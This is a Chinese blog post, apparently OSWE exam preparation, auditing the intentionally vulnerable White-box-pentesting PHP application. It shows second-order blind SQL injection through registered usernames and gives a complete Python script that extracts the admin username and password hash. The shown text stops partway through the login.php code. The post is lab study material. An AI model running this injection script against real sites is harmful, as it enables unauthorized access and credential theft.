<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"n0maj1o24.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="备考OSWE，本次分析的代码是White-box-pentesting。涉及到三个漏洞，二阶盲注、登录逻辑验证不当、模版注入。 首先访问网站，如下所示：  可以看到网站需要登录，我们暂时没有用户，尝试注册。注册的部分实现代码在trouble1_whiteBox&#x2F;register.php： 123456789&lt;?php   include(&quot;config.php&quot;);   session_st">
<meta property="og:type" content="article">
<meta property="og:title" content="WBP代码审计">
<meta property="og:url" content="https://n0maj1o24.github.io/2021/06/15/WBP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/index.html">
<meta property="og:site_name" content="Technical Memorandum">
<meta property="og:description" content="备考OSWE，本次分析的代码是White-box-pentesting。涉及到三个漏洞，二阶盲注、登录逻辑验证不当、模版注入。 首先访问网站，如下所示：  可以看到网站需要登录，我们暂时没有用户，尝试注册。注册的部分实现代码在trouble1_whiteBox&#x2F;register.php： 123456789&lt;?php   include(&quot;config.php&quot;);   session_st">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://n0maj1o24.github.io/2021/06/15/WBP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/login_wh.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2021/06/15/WBP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/log.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2021/06/15/WBP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/1=1.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2021/06/15/WBP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/2=1.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2021/06/15/WBP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/twig.png">
<meta property="article:published_time" content="2021-06-14T20:14:40.000Z">
<meta property="article:modified_time" content="2021-07-06T12:59:19.862Z">
<meta property="article:author" content="n0maj1o24">
<meta property="article:tag" content="PHP">
<meta property="article:tag" content="OSWE">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://n0maj1o24.github.io/2021/06/15/WBP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/login_wh.png">

<link rel="canonical" href="https://n0maj1o24.github.io/2021/06/15/WBP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>WBP代码审计 | Technical Memorandum</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Technical Memorandum</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://n0maj1o24.github.io/2021/06/15/WBP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpeg">
      <meta itemprop="name" content="n0maj1o24">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Technical Memorandum">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          WBP代码审计
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-06-14 20:14:40" itemprop="dateCreated datePublished" datetime="2021-06-14T20:14:40Z">2021-06-14</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-07-06 12:59:19" itemprop="dateModified" datetime="2021-07-06T12:59:19Z">2021-07-06</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Code-Audit/" itemprop="url" rel="index"><span itemprop="name">Code Audit</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2021/06/15/WBP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2021/06/15/WBP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>备考OSWE，本次分析的代码是<a href="https://github.com/TROUBLE-1/White-box-pentesting.git" target="_blank" rel="noopener">White-box-pentesting</a>。涉及到三个漏洞，<strong>二阶盲注</strong>、<strong>登录逻辑验证不当</strong>、<strong>模版注入</strong>。</p>
<p>首先访问网站，如下所示：</p>
<p><img src="/2021/06/15/WBP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/login_wh.png" alt="label"></p>
<p>可以看到网站需要登录，我们暂时没有用户，尝试注册。注册的部分实现代码在<code>trouble1_whiteBox/register.php</code>：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">   <span class="keyword">include</span>(<span class="string">"config.php"</span>);</span><br><span class="line">   session_start();</span><br><span class="line"></span><br><span class="line">   <span class="keyword">if</span>($_SERVER[<span class="string">"REQUEST_METHOD"</span>] == <span class="string">"POST"</span>) &#123;</span><br><span class="line">      <span class="comment">// username and password sent from form </span></span><br><span class="line">      <span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'register'</span>]))&#123;</span><br><span class="line">          $myusername = mysqli_real_escape_string($db,$_POST[<span class="string">'username'</span>]);</span><br><span class="line">          $mypassword = mysqli_real_escape_string($db,$_POST[<span class="string">'form_password_hidden'</span>]);</span><br></pre></td></tr></table></figure>

<p>可以发现对注册的用户名和密码适用<code>mysqli_real_escape_string</code>函数进行了过滤。</p>
<p>随便注册一个普通账户，登录之后发现会显示登录日志。</p>
<p><img src="/2021/06/15/WBP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/log.png" alt="label"></p>
<p>日志信息会更新存入数据库，然后是从数据库中获取的，更新日志代码实现在<code>trouble1_whiteBox/user_log_update.php</code>中，部分代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line"> <span class="keyword">include</span>(<span class="string">'session.php'</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">   <span class="keyword">if</span>(<span class="keyword">isset</span>($login_session)) &#123;</span><br><span class="line"></span><br><span class="line">	  $date = date(<span class="string">'m/d/Y h:i:s a'</span>, time());</span><br><span class="line">	  $sql = <span class="string">"INSERT INTO user_log(username, login_date) values ('$login_session', '$date')"</span>;</span><br><span class="line">          $result = mysqli_query($db,$sql);</span><br><span class="line">	  $row = mysqli_fetch_array($result,MYSQLI_ASSOC);</span><br><span class="line">	</span><br><span class="line">	 <span class="keyword">if</span>($result == <span class="keyword">true</span>)&#123;</span><br><span class="line">		header(<span class="string">"location: welcome.php"</span>);</span><br><span class="line">		$log_update_msg = <span class="string">'Log files updated'</span>;		</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p>如果这里的<code>insert</code>出现错误，则用户的信息不会被插入数据库。</p>
<p>显示日志代码实现在<code>trouble1_whiteBox/user_log.php</code>，部分代码实现如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>($login_session)) &#123;</span><br><span class="line"> </span><br><span class="line">         $sql = <span class="string">"SELECT * FROM user_log WHERE username = '$login_session'"</span>;   </span><br><span class="line">    </span><br><span class="line">         $res=$db-&gt;query($sql);</span><br><span class="line">  </span><br><span class="line">    $count = <span class="string">'1'</span>;</span><br><span class="line">    </span><br><span class="line">       <span class="keyword">while</span>($row = @mysqli_fetch_array($res))</span><br><span class="line">    </span><br><span class="line">       &#123;</span><br><span class="line">    </span><br><span class="line">           <span class="keyword">echo</span> $count.<span class="string">' '</span>.<span class="string">'Username: '</span>.$row[<span class="string">"username"</span>].<span class="string">' '</span>.<span class="string">'Date: '</span>. $row[<span class="string">"login_date"</span>].<span class="string">'&lt;br&gt;'</span>;</span><br><span class="line">    </span><br><span class="line">    $count = $count + <span class="number">1</span>;</span><br><span class="line">       </span><br><span class="line">       &#125;                 </span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>注意查询用户登录日志的时候，用户名使用的<code>$login_session</code>,这个变量是从数据里直接取出来的，虽然注册的用户名经过过滤，但是用户名中如果存在单引号会带入数据库中，如果后续从数据库中取出该用户名，没有过滤的话会引起注入。</p>
<p>查看<code>trouble1_whiteBox/session.php</code>文件实现代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">   <span class="keyword">include</span>(<span class="string">'config.php'</span>);</span><br><span class="line">   session_start();</span><br><span class="line">   </span><br><span class="line">   $user_check = $_SESSION[<span class="string">'login_user'</span>];</span><br><span class="line">   </span><br><span class="line">   $ses_sql = mysqli_query($db,<span class="string">"select username from users where username = '$user_check' "</span>);</span><br><span class="line">   </span><br><span class="line">   $row = mysqli_fetch_array($ses_sql,MYSQLI_ASSOC);</span><br><span class="line"></span><br><span class="line">   </span><br><span class="line">   $login_session = $row[<span class="string">'username'</span>]; </span><br><span class="line">   </span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(!<span class="keyword">isset</span>($login_session))&#123;</span><br><span class="line">        header(<span class="string">"location: index.php"</span>);</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>获取用户名存在问题，如果用户输入的用户名存在单引号等注入非法字符，会原封不动的从数据库里获取，这样<code>$login_session</code>就带入了单引号，在查询登录日志信息时会引起注入。</p>
<p>注册两个用户，分别是<code>&#39; or 1=1#</code>和<code>&#39; or 1=2#</code>，登录之后，发现用户登录日志会不同，也就是说这里存在二阶盲注。</p>
<p><code>&#39; or 1=1#</code>登录后的日志信息截图如下：</p>
<p><img src="/2021/06/15/WBP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/1=1.png" alt="label"></p>
<p><code>&#39; or 1=2#</code>登录后的日志信息截图如下：</p>
<p><img src="/2021/06/15/WBP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/2=1.png" alt="label"></p>
<p>那么，就可以通过二阶盲注获取管理员用户和密码。具体代码实现如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">sha1</span><span class="params">(password)</span>:</span></span><br><span class="line">    m = hashlib.sha1()</span><br><span class="line">    m.update(password.encode(<span class="string">"utf-8"</span>))</span><br><span class="line">    <span class="keyword">return</span> m.hexdigest()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">gen_hash</span><span class="params">(password, token)</span>:</span></span><br><span class="line">    m = hashlib.sha1()</span><br><span class="line">    m.update((password + token).encode(<span class="string">"utf-8"</span>))</span><br><span class="line">    <span class="keyword">return</span> m.hexdigest()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">register</span><span class="params">(ip, inj_str)</span>:</span></span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">32</span>, <span class="number">126</span>):</span><br><span class="line">        <span class="comment"># Getting registered</span></span><br><span class="line">        target = <span class="string">"http://%s//register.php"</span> % (ip)</span><br><span class="line">        password = <span class="string">'password'</span></span><br><span class="line">        passhashed = sha1(password)</span><br><span class="line">        username = <span class="string">'%s'</span> % (inj_str.replace(<span class="string">"[CHAR]"</span>, str(j)))</span><br><span class="line"></span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">"form_password_hidden"</span>: passhashed,</span><br><span class="line">            <span class="string">"username"</span>: username,</span><br><span class="line">            <span class="string">"password"</span>: <span class="string">""</span>,</span><br><span class="line">            <span class="string">"register"</span>: <span class="string">'submit'</span></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        r = requests.post(target, data=data, allow_redirects=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># Logging in</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login</span><span class="params">(ip, inj_str)</span>:</span></span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">32</span>, <span class="number">126</span>):</span><br><span class="line">        target = <span class="string">"http://%s/login.php"</span> % (ip)</span><br><span class="line">        token = <span class="string">'token'</span></span><br><span class="line">        password = <span class="string">'password'</span></span><br><span class="line">        passhashed = sha1(password)</span><br><span class="line">        hashed = gen_hash(passhashed, token)</span><br><span class="line">        username = <span class="string">'%s'</span> % (inj_str.replace(<span class="string">"[CHAR]"</span>, str(j)))</span><br><span class="line"></span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">"form_password_hidden"</span>: hashed,</span><br><span class="line">            <span class="string">"username"</span>: username,</span><br><span class="line">            <span class="string">"password"</span>: <span class="string">""</span>,</span><br><span class="line">            <span class="string">"submit"</span>: <span class="string">'submit'</span>,</span><br><span class="line">            <span class="string">"token"</span>: <span class="string">'token'</span></span><br><span class="line">        &#125;</span><br><span class="line">        s = requests.Session()</span><br><span class="line">        r = s.post(target, data=data)</span><br><span class="line">        res = r.text</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> <span class="string">'welcome'</span> <span class="keyword">in</span> res <span class="keyword">or</span> <span class="string">'Welcome'</span> <span class="keyword">in</span> res:</span><br><span class="line"></span><br><span class="line">            <span class="comment"># open log files</span></span><br><span class="line">            target = <span class="string">"http://%s/user_log.php"</span> % (ip)</span><br><span class="line">            r = s.get(target)</span><br><span class="line">            content_length = int(r.headers[<span class="string">'Content-Length'</span>])</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> content_length &gt; <span class="number">344</span>:</span><br><span class="line">                <span class="keyword">return</span> j</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">inject</span><span class="params">(r, inj, ip)</span>:</span></span><br><span class="line">    extracted = <span class="string">""</span></span><br><span class="line">    <span class="keyword">for</span> k <span class="keyword">in</span> range(<span class="number">1</span>, r):</span><br><span class="line"></span><br><span class="line">        injection_string = <span class="string">"'or (ascii(substring(((%s)),%s,1)))=[CHAR]#"</span> % (inj, k)</span><br><span class="line">        register(ip, injection_string)</span><br><span class="line">        retrieved_value = login(ip, injection_string)</span><br><span class="line">        <span class="keyword">if</span> retrieved_value:</span><br><span class="line">            extracted += chr(retrieved_value)</span><br><span class="line">            extracted_char = chr(retrieved_value)</span><br><span class="line">            sys.stdout.write(extracted_char)</span><br><span class="line">            sys.stdout.flush()</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            print(<span class="string">"\n(+) done!"</span>)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">return</span> extracted</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">if</span> len(sys.argv) != <span class="number">2</span>:</span><br><span class="line">        print(<span class="string">"(+) usage: %s &lt;target&gt;"</span> % sys.argv[<span class="number">0</span>])</span><br><span class="line">        print(<span class="string">'(+) eg: %s 192.168.1.100'</span> % sys.argv[<span class="number">0</span>])</span><br><span class="line">        sys.exit(<span class="number">-1</span>)</span><br><span class="line"></span><br><span class="line">    ip = sys.argv[<span class="number">1</span>]</span><br><span class="line"></span><br><span class="line">    print(<span class="string">"(+) logging in"</span>)</span><br><span class="line">    print(<span class="string">"(+) Retrieving username...."</span>)</span><br><span class="line">    query = <span class="string">"select username from admin where id=1"</span></span><br><span class="line">    username = inject(<span class="number">40</span>, query, ip)</span><br><span class="line">    print(<span class="string">"(+) Retrieving Password hash...."</span>)</span><br><span class="line">    query = <span class="string">'select password from admin where username = \'%s\' limit 1'</span> % (username)</span><br><span class="line">    password = inject(<span class="number">50</span>, query, ip)</span><br><span class="line">    print(<span class="string">"(+) Credentials: %s / %s"</span> % (username, password))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>

<p>接下里看一下登录逻辑，<code>trouble1_whiteBox/login.php</code>：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">   <span class="keyword">include</span>(<span class="string">"config.php"</span>);</span><br><span class="line">   </span><br><span class="line">   session_start();</span><br><span class="line"></span><br><span class="line">   <span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'token'</span>]))</span><br><span class="line">   </span><br><span class="line">   &#123;</span><br><span class="line">   </span><br><span class="line">    $_SESSION[<span class="string">'token'</span>] = $_POST[<span class="string">'token'</span>];</span><br><span class="line">   </span><br><span class="line">   &#125;</span><br><span class="line">   </span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (!<span class="keyword">isset</span>($_SESSION[<span class="string">'token'</span>]))</span><br><span class="line">   </span><br><span class="line">        $_SESSION[<span class="string">'token'</span>] = sha1(mt_rand() . microtime(<span class="keyword">TRUE</span>));</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">   <span class="keyword">if</span>($_SERVER[<span class="string">"REQUEST_METHOD"</span>] == <span class="string">"POST"</span>) &#123;</span><br><span class="line">   </span><br><span class="line">   </span><br><span class="line">      <span class="comment">// username and password sent from form </span></span><br><span class="line">   </span><br><span class="line">      <span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'username'</span>]))&#123;</span><br><span class="line">   </span><br><span class="line">          $myusername = mysqli_real_escape_string($db,$_POST[<span class="string">'username'</span>]);</span><br><span class="line">   </span><br><span class="line">          $mypassword = mysqli_real_escape_string($db,$_POST[<span class="string">'form_password_hidden'</span>]); </span><br><span class="line">   </span><br><span class="line">          $passtoken = $_SESSION[<span class="string">'token'</span>];</span><br><span class="line">     </span><br><span class="line">          $sql = <span class="string">"SELECT id FROM users WHERE username = '$myusername' and SHA1(CONCAT(password, '$passtoken'))='$mypassword'"</span>;</span><br><span class="line">   </span><br><span class="line">          $result = mysqli_query($db,$sql);</span><br><span class="line">   </span><br><span class="line">          $row = mysqli_fetch_array($result,MYSQLI_ASSOC);</span><br><span class="line">   </span><br><span class="line">          $active = $row[<span class="string">'active'</span>];</span><br><span class="line">      </span><br><span class="line">          $count = mysqli_num_rows($result);</span><br><span class="line">      </span><br><span class="line">          <span class="comment">// If result matched $myusername and $mypassword, table row must be 1 row</span></span><br><span class="line">  </span><br><span class="line">          <span class="keyword">if</span>($count == <span class="number">1</span>) &#123;  </span><br><span class="line">   		